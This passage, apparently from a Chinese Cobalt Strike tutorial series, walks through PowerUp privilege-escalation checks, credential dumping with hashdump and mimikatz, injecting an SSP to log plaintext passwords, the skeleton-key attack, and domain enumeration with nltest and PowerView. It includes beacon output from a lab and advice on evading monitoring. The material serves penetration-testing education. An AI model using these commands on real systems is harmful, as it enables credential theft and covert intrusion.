<p>利用 PowerUp 进行提权需要首先导入 ps1 文件<code>powershell-import PowerUp.ps1</code>，再执行<code>powershell Invoke-AllChecks</code>命令，使用 PowerUp 脚本可以快速的帮助我们发现系统弱点，从而实现提权的目的。</p> <blockquote><p>其中<code>PowerUp.ps1</code>文件可从这里下载：<a href="https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc" target="_blank" rel="noopener noreferrer">https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p></blockquote> <p><strong>PowerUp 的使用</strong></p> <p>执行以下命令：将 ps1 文件上传到目标主机，并执行所有弱点检查。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>powershell-import PowerUp.ps1
powershell invoke-allchecks
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>详细运行过程：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>beacon&gt; powershell-import PowerUp.ps1
[*] Tasked beacon to import: PowerUp.ps1
[+] host called home, sent: 275084 bytes

beacon&gt; powershell invoke-allchecks
[*] Tasked beacon to run: invoke-allchecks
[+] host called home, sent: 313 bytes
[+] received output:
[*] Running Invoke-AllChecks
[+] Current user already has local administrative privileges!
[*] Checking for unquoted service paths...

[*] Checking service executable and argument permissions...
[+] received output:
ServiceName                     : AeLookupSvc
Path                            : C:\Windows\system32\svchost.exe -k netsvcs
ModifiableFile                  : C:\Windows\system32
ModifiableFilePermissions       : GenericAll
ModifiableFileIdentityReference : BUILTIN\Administrators
StartName                       : localSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AeLookupSvc'
CanRestart                      : True
……内容太多，此处省略……

[*] Checking service permissions...
[+] received output:
ServiceName   : AeLookupSvc
Path          : C:\Windows\system32\svchost.exe -k netsvcs
StartName     : localSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AeLookupSvc'
CanRestart    : True
……内容太多，此处省略……

[*] Checking %PATH% for potentially hijackable DLL locations...
[+] received output:
Permissions       : GenericAll
ModifiablePath    : C:\Windows\system32\WindowsPowerShell\v1.0\
IdentityReference : BUILTIN\Administrators
%PATH%            : %SystemRoot%\system32\WindowsPowerShell\v1.0\
AbuseFunction     : Write-HijackDll -DllPath 'C:\Windows\system32\WindowsPowerS
                    hell\v1.0\\wlbsctrl.dll'
……内容太多，此处省略……

[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...

[*] Checking for modifidable registry autoruns and configs...
[+] received output:
Key            : HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VMware Use
                 r Process
Path           : &quot;C:\Program Files\VMware\VMware Tools\vmtoolsd.exe&quot; -n vmusr
ModifiableFile : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files
                 \VMware\VMware Tools\vmtoolsd.exe; IdentityReference=BUILTIN\A
                 dministrators}
……内容太多，此处省略……

[*] Checking for modifiable schtask files/configs...
[+] received output:
TaskName     : GoogleUpdateTaskMachineCore
TaskFilePath : @{Permissions=System.Object[]; ModifiablePath=C:\Program Files (
               x86)\Google\Update\GoogleUpdate.exe; IdentityReference=BUILTIN\A
               dministrators}
TaskTrigger  : &lt;Triggers xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mi
               t/task&quot;&gt;&lt;LogonTrigger&gt;&lt;Enabled&gt;true&lt;/Enabled&gt;&lt;/LogonTrigger&gt;&lt;Cal
               endarTrigger&gt;&lt;StartBoundary&gt;2020-04-11T21:47:44&lt;/StartBoundary&gt;&lt;
               ScheduleByDay&gt;&lt;DaysInterval&gt;1&lt;/DaysInterval&gt;&lt;/ScheduleByDay&gt;&lt;/Ca
               lendarTrigger&gt;&lt;/Triggers&gt;
……内容太多，此处省略……

[*] Checking for unattended install files...
UnattendPath : C:\Windows\Panther\Unattend.xml

[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
[+] received output:
[*] Checking for cached Group Policy Preferences .xml files....
[+] received output:
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br><span class="line-number">30</span><br><span class="line-number">31</span><br><span class="line-number">32</span><br><span class="line-number">33</span><br><span class="line-number">34</span><br><span class="line-number">35</span><br><span class="line-number">36</span><br><span class="line-number">37</span><br><span class="line-number">38</span><br><span class="line-number">39</span><br><span class="line-number">40</span><br><span class="line-number">41</span><br><span class="line-number">42</span><br><span class="line-number">43</span><br><span class="line-number">44</span><br><span class="line-number">45</span><br><span class="line-number">46</span><br><span class="line-number">47</span><br><span class="line-number">48</span><br><span class="line-number">49</span><br><span class="line-number">50</span><br><span 
class="line-number">51</span><br><span class="line-number">52</span><br><span class="line-number">53</span><br><span class="line-number">54</span><br><span class="line-number">55</span><br><span class="line-number">56</span><br><span class="line-number">57</span><br><span class="line-number">58</span><br><span class="line-number">59</span><br><span class="line-number">60</span><br><span class="line-number">61</span><br><span class="line-number">62</span><br><span class="line-number">63</span><br><span class="line-number">64</span><br><span class="line-number">65</span><br><span class="line-number">66</span><br><span class="line-number">67</span><br><span class="line-number">68</span><br><span class="line-number">69</span><br><span class="line-number">70</span><br><span class="line-number">71</span><br><span class="line-number">72</span><br><span class="line-number">73</span><br><span class="line-number">74</span><br><span class="line-number">75</span><br><span class="line-number">76</span><br><span class="line-number">77</span><br><span class="line-number">78</span><br></div></div><p>如果在自己的靶机上发现导入ps1文件失败，这可能是因为系统不允许执行不信任的脚本文件导致的。</p> <p>这时为了复现成功可以来到靶机下，以管理员权限打开 Powershell，运行<code>set-ExecutionPolicy RemoteSigned</code>，输入<code>Y</code>回车，此时系统便能导入<code>PowerUp.ps1</code>文件了。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>PS C:\WINDOWS\system32&gt; set-ExecutionPolicy RemoteSigned
执行策略更改
执行策略可帮助你防止执行不信任的脚本。更改执行策略可能会产生安全风险，如 https:/go.microsoft.com/fwlink/?LinkID=135170
中的 about_Execution_Policies 帮助主题所述。是否要更改执行策略?
[Y] 是(Y)  [A] 全是(A)  [N] 否(N)  [L] 全否(L)  [S] 暂停(S)  [?] 帮助 (默认值为“N”): Y
PS C:\WINDOWS\system32&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>在运行<code>Invoke-AllChecks</code>后，便会列出当前系统中可被提权的弱点之处，之后再执行检查结果中<code>AbuseFunction</code>下的命令便能开始提权操作了。</p> <p>但是我在自己本地环境中并未复现成功，执行<code>AbuseFunction</code>后的命令只能创建一个与当前登录用户相同权限的账户，没能达到提权的目的。</p> <p>参考网上相关文章后也未果，这也是为什么这一节拖更这么久的原因，因此 PowerUp 的复现过程暂时就没法记录了。</p> <p>如果正在看本篇文章的你有过使用 PowerUp 提权成功的经历，欢迎留言分享。</p> <h2 id="_4、凭证和哈希获取">4、凭证和哈希获取 <a href="#_4、凭证和哈希获取" class="header-anchor">#</a></h2> <p>想要获取凭证信息，可以在管理员权限的会话处右击选择<code>Access --&gt; Dump Hashes</code>，或者在控制台中使用<code>hashdump</code>命令。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs14-1.png" alt=""></p> <p>想获取当前用户的密码，可以运行<code>mimikatz</code>，右击管理员权限会话选择<code>Access --&gt; Run Mimikatz</code>，或在控制台运行<code>logonpasswords</code>命令。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs14-2.png" alt=""></p> <p>在<code>View --&gt; Credentials</code>下可以查看到<code>hashdump</code>与<code>mimikatz</code>获取的数据。</p> <h2 id="_5、beacon-中的-mimikatz">5、Beacon 中的 Mimikatz <a href="#_5、beacon-中的-mimikatz" class="header-anchor">#</a></h2> <p>在 Beacon 中集成了 mimikatz ，mimikatz 执行命令有三种形式：</p> <ul><li><p><code>mimikatz [module::command] &lt;args&gt;</code></p> <p>运行 mimikatz 命令</p></li> <li><p><code>mimikatz [!module::command] &lt;args&gt;</code></p> <p>强制提升到 SYSTEM 权限再运行命令，因为一些命令只有在 SYSTEM 身份下才能被运行。</p></li> <li><p><code>mimikatz [@module::command] &lt;args&gt;</code></p> <p>使用当前 Beacon 的访问令牌运行 mimikatz 命令</p></li></ul> <p>下面是一些<code>mimikatz</code>命令。</p> <ul><li><p><code>!lsadump::cache</code></p> <p>获取缓存凭证，默认情况下 Windows 会缓存最近10个密码哈希</p></li> <li><p><code>!lsadump::sam</code></p> <p>获取本地账户密码哈希，该命令与 hashdump 比较类似</p></li> <li><p><code>misc::cmd</code></p> <p>如果注册表中禁用了 CMD ，就重新启用它</p></li> 
<li><p><code>!misc::memssp</code></p> <p>注入恶意的 Windows SSP 来记录本地身份验证凭据，这个凭证存储在“C:\windows\system32\mimilsa.log”中</p></li> <li><p><code>misc::skeleton</code></p> <p>该命令仅限域内使用。该命令会给所有域内用户添加一个相同的密码，域内所有的用户都可以使用这个密码进行认证，同时原始密码也可以使用，其原理是对 lsass.exe 进行注入，重启后会失效。</p></li> <li><p><code>process::suspend [pid]</code></p> <p>挂起某个进程，但是不结束它</p></li> <li><p><code>process::resume [pid]</code></p> <p>恢复挂起的进程</p></li></ul> <p>以上的这些只是<code>mimikatz</code>能做的事情的一小部分，下面看看<code>!misc::memssp</code>的使用。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>mimikatz !misc::memssp
cd C:\Windows\system32
shell dir mimilsa.log
shell type mimilsa.log
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>详细运行过程：</p> <p>首先运行<code>mimikatz !misc::memssp</code></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>beacon&gt; mimikatz !misc::memssp
[*] Tasked beacon to run mimikatz's !misc::memssp command
[+] host called home, sent: 1006151 bytes
[+] received output:
Injected =)
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>接下来来到<code>C:\Windows\system32</code>目录</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>beacon&gt; cd C:\Windows\system32
[*] cd C:\Windows\system32
[+] host called home, sent: 27 bytes

beacon&gt; shell dir mimilsa.log
[*] Tasked beacon to run: dir mimilsa.log
[+] host called home, sent: 46 bytes
[+] received output:
 驱动器 C 中的卷没有标签。
 卷的序列号是 BE29-9C84

 C:\Windows\system32 的目录

2020/07/23  21:47                24 mimilsa.log
               1 个文件             24 字节
               0 个目录 17,394,728,960 可用字节
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br></div></div><p>可以看到是存在<code>mimilsa.log</code>文件的，此时待目标主机重新登录，比如电脑锁屏后用户进行登录。</p> <p>查看<code>mimilsa.log</code>文件内容。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>beacon&gt; shell type mimilsa.log
[*] Tasked beacon to run: type mimilsa.log
[+] host called home, sent: 47 bytes
[+] received output:
[00000000:000003e5] \	
[00000000:002b99a7] WIN-75F8PRJM4TP\Administrator	Password123!
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>成功获取到当前登录用户的明文密码。</p> <h1 id="_0x06-横向扩展">0x06 横向扩展 <a href="#_0x06-横向扩展" class="header-anchor">#</a></h1> <h2 id="_1、windows-企业局域网环境介绍">1、Windows 企业局域网环境介绍 <a href="#_1、windows-企业局域网环境介绍" class="header-anchor">#</a></h2> <p><strong>活动目录</strong></p> <p>活动目录<code>Active Directory</code>是一种能够集中管理用户、系统和策略的技术，活动目录的一个重要概念就是<code>域</code>。</p> <p>Active Directory 存储有关网络上对象的信息，并让管理员和用户可以更容易地使用这些信息。例如 Active Directory 域服务即 AD DS 存储着有关用户账户的信息，并且使同一网络下的其他授权用户可以访问此信息。</p> <p><strong>域</strong></p> <p>域<code>Domain</code>即是一个管理边界，或者说是网络边界，在域里的用户和系统都是通过 AD 进行管理的。</p> <p>在域里，如果想控制服务器进行操作就需要取得域的信任。</p> <p><strong>域控制器</strong></p> <p>域控制器<code>Domain Controller</code>顾名思义就是对域里的用户和系统进行身份验证的系统。</p> <p><strong>本地用户</strong></p> <p>本地用户<code>Local User</code>就是系统上的一个标准用户。</p> <p>当我们想在 Windows 命令行下指定一个本地的用户时，可以通过输入 <code>.\本地用户名</code>或者 <code>计算机名\本地用户名</code>来指定本地的用户账户，其中<code>.</code>表示本机的计算机名。</p> <p><strong>域用户</strong></p> <p>域用户<code>Domain User</code>是指域控制器下的用户，如果想指定域用户，可以输入<code>域名\域用户名</code>。</p> <p><strong>本地管理员</strong></p> <p>本地管理员<code>Local Administrator</code>即是指在本地系统有管理权限的用户。</p> <p><strong>域管理员</strong></p> <p>域管理员<code>Domain Administrator</code>是指在域控制器上有管理权限的用户。</p> <blockquote><p>注意：以下命令是在主机中运行的结果，在 Cobalt Strike 中运行只需要根据命令类型在命令前加上 shell 或者 powershell 即可。</p></blockquote> <h2 id="_2、主机和用户枚举">2、主机和用户枚举 <a href="#_2、主机和用户枚举" class="header-anchor">#</a></h2> <h3 id="主机枚举">主机枚举 <a href="#主机枚举" class="header-anchor">#</a></h3> <p><strong>一些问题</strong></p> <p>当进入目标局域网时，需要弄清楚几个问题。</p> <p>1、我正处在哪个域上？</p> <p>2、域信任关系是什么样的？</p> <p>3、可以登录哪些域？这些域上有哪些系统？目标是什么？可以获取什么？</p> <p>4、系统上存放共享数据的地方在哪里？</p> <p><strong>一些枚举的命令</strong></p> <ul><li><p><code>net view /domain</code></p> 
<p>枚举出当前域</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; net view <span class="token operator">/</span>domain
Domain
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
TEAMSSIX
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><ul><li><p><code>net view /domain:[domain]</code>、<code>net group &quot;domain computers&quot; /domain</code></p> <p><code>net view /domain:[domain]</code>枚举域上一个主机的列表，但不是所有主机，这个也就是在网上邻居中可以看到的内容。</p> <p><code>net group &quot;domain computers&quot; /domain</code>可以获得加入到这个域中的电脑账户列表。</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; net view <span class="token operator">/</span>domain:teamssix
服务器名称            注解
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
\\WIN<span class="token operator">-</span>72A8ERDSF2P
\\WIN<span class="token operator">-</span>P2AASSD1AF1
命令成功完成。

<span class="token function">PS</span> C:\&gt; net <span class="token function">group</span> <span class="token string">&quot;domain computers&quot;</span> <span class="token operator">/</span>domain
组名     Domain Computers
注释     加入到域中的所有工作站和服务器
成员
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
WIN<span class="token operator">-</span>72A8ERDSF2P$
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br></div></div><ul><li><p><code>nltest /dclist:[domain]</code></p> <p>如果想找到哪台主机是域的域控服务器，可以使用<code>nltest</code>命令。</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; nltest <span class="token operator">/</span>dclist:teamssix
获得域“teamssix”中 DC 的列表<span class="token punctuation">(</span>从“\\WIN<span class="token operator">-</span>P2AASSD1AF1”中<span class="token punctuation">)</span>。
    WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com <span class="token namespace">[PDC]</span>  <span class="token namespace">[DS]</span> 站点: Default<span class="token operator">-</span>First<span class="token operator">-</span>Site<span class="token operator">-</span>Name
此命令成功完成
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>当 32 位的 payload 运行在 64 位的系统上，并且 nltest 的路径解析不对时，可能会提示没有 nltest 这个命令，这时可以尝试使用下面的命令为其指定完整路径。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; C:\windows\sysnative\nltest <span class="token operator">/</span>dclist:teamssix
获得域“teamssix”中 DC 的列表<span class="token punctuation">(</span>从“\\WIN<span class="token operator">-</span>P2AASSD1AF1”中<span class="token punctuation">)</span>。
    WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com <span class="token namespace">[PDC]</span>  <span class="token namespace">[DS]</span> 站点: Default<span class="token operator">-</span>First<span class="token operator">-</span>Site<span class="token operator">-</span>Name
此命令成功完成
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><ul><li><p><code>nslookup [name]</code>、<code>ping -n 1 -4 [name]</code></p> <p>有时在 Cobalt Strike 里，我们只需要使用目标的 NetBIOS 名称，而不用在意使用 IPv4 地址或者 IPv6 地址，NetBIOS 名称是在域上每台机器的完整名称。</p> <p>但是如果想把一个 NetBIOS 名称解析为对应的 IPv4 地址（如下面的示例），可以使用 nslookup 命令，或者使用 ping 发送一个数据包来获得主机返回的 IP 地址。</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; nslookup WIN<span class="token operator">-</span>P2AASSD1AF1
服务器:  UnKnown
Address:  ::1
名称:    WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
Address:  192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124

<span class="token function">PS</span> C:\&gt; ping <span class="token operator">-</span>n 1 <span class="token operator">-</span>4 WIN<span class="token operator">-</span>P2AASSD1AF1
正在 Ping WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com <span class="token punctuation">[</span>192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124<span class="token punctuation">]</span> 具有 32 字节的数据:
来自 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124 的回复: 字节=32 时间&lt;1ms TTL=128
192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124 的 Ping 统计信息:
    数据包: 已发送 = 1，已接收 = 1，丢失 = 0 <span class="token punctuation">(</span>0<span class="token operator">%</span> 丢失<span class="token punctuation">)</span>，
往返行程的估计时间<span class="token punctuation">(</span>以毫秒为单位<span class="token punctuation">)</span>:
    最短 = 0ms，最长 = 0ms，平均 = 0ms
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><ul><li><p><code>nltest /domain_trusts</code>、<code>nltest /server:[address] /domain_trusts</code></p> <p>如果想取得域上的信任关系，可以使用 nltest 命令来实现。</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; nltest <span class="token operator">/</span>domain_trusts
域信任的列表:
    0: TEAMSSIX teamssix<span class="token punctuation">.</span>com <span class="token punctuation">(</span>NT 5<span class="token punctuation">)</span> <span class="token punctuation">(</span>Forest Tree Root<span class="token punctuation">)</span> <span class="token punctuation">(</span>Primary Domain<span class="token punctuation">)</span> <span class="token punctuation">(</span>Native<span class="token punctuation">)</span>
此命令成功完成

<span class="token function">PS</span> C:\&gt; nltest <span class="token operator">/</span>server:192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>15<span class="token punctuation">.</span>124 <span class="token operator">/</span>domain_trusts
域信任的列表:
    0: TEAMSSIX teamssix<span class="token punctuation">.</span>com <span class="token punctuation">(</span>NT 5<span class="token punctuation">)</span> <span class="token punctuation">(</span>Forest Tree Root<span class="token punctuation">)</span> <span class="token punctuation">(</span>Primary Domain<span class="token punctuation">)</span> <span class="token punctuation">(</span>Native<span class="token punctuation">)</span>
此命令成功完成
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><ul><li><p><code>net view \\[name]</code></p> <p>如果想列出主机上的共享列表，只需输入<code>net view \\[name]</code>即可</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\&gt; net view \\WIN<span class="token operator">-</span>P2AASSD1AF1
在 \\WIN<span class="token operator">-</span>75F8PRJM4TP 的共享资源
共享名  类型  使用为  注释
<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">--</span>-<span class="token operator">-</span>
Users   Disk
命令成功完成。
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><h4 id="powerview">PowerView <a href="#powerview" class="header-anchor">#</a></h4> <p>在渗透进入内网后，如果直接使用 Windows 的内置命令，比如 <code>net view、net user</code>等，可能就会被管理人员或者各种安全监控设备所发现。因此较为安全的办法就是使用 PowerShell 和 WMI 来躲避态势感知的检测。</p> <p>PowerView 是由 Will Schroeder 开发的 PowerShell 脚本，该脚本完全依赖于 PowerShell 和 WMI，使用 PowerView 可以更好地收集内网中的信息，在使用之前，与上一节的 PowerUp 一样需要先 import 导入 ps1 文件。</p> <p>PowerView 下载地址：<a href="https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon" target="_blank" rel="noopener noreferrer">https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>一些 PowerView 的命令：</p> <ul><li><p>Get-NetDomain</p> <p>查询本地域的信息</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\PowerView&gt; <span class="token function">Get-NetDomain</span>
Forest                  : teamssix<span class="token punctuation">.</span>com
DomainControllers       : <span class="token punctuation">{</span>WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com<span class="token punctuation">}</span>
Children                : <span class="token punctuation">{</span><span class="token punctuation">}</span>
DomainMode              : Windows2012Domain
Parent                  :
PdcRoleOwner            : WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
RidRoleOwner            : WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
InfrastructureRoleOwner : WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com
Name                    : teamssix<span class="token punctuation">.</span>com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br></div></div><ul><li><p>Invoke-ShareFinder</p> <p>查找网络上是否存在共享</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\PowerView&gt; <span class="token function">Invoke-ShareFinder</span>
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\ADMIN$   <span class="token operator">-</span> 远程管理
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\C$       <span class="token operator">-</span> 默认共享
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\IPC$     <span class="token operator">-</span> 远程 IPC
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\NETLOGON         <span class="token operator">-</span> Logon server share
\\WIN<span class="token operator">-</span>P2AASSD1AF1<span class="token punctuation">.</span>teamssix<span class="token punctuation">.</span>com\SYSVOL   <span class="token operator">-</span> Logon server share
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><ul><li><p>Invoke-MapDomainTrust</p> <p>显示当前域的信任关系</p></li></ul> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token function">PS</span> C:\PowerView&gt; <span class="token function">Invoke-MapDomainTrust</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>其他更多用法可以查看参考链接，或者参考 PowerView 项目上的 ReadMe 部分。</p> <h4 id="net-模块">Net 模块 <a href="#net-模块" class="header-anchor">#</a></h4> <p>Cobalt Strike 中有自己的 net 模块，net 模块是 beacon 的后渗透模块，它通过 Windows 的网络管理 API 函数来执行命令，想使用 net 命令，只需要在 beacon 的控制台输入 net + 要执行的命令即可。</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>net dclist : 列出当前域的域控制器
net dclist <span class="token namespace">[DOMAIN]</span> : 列出指定域的域控制器
net share \\<span class="token namespace">[name]</span> : 列出目标的共享列表
net view : 列出当前域的主机
net view <span class="token namespace">[DOMAIN]</span> : 列出指定域的主机
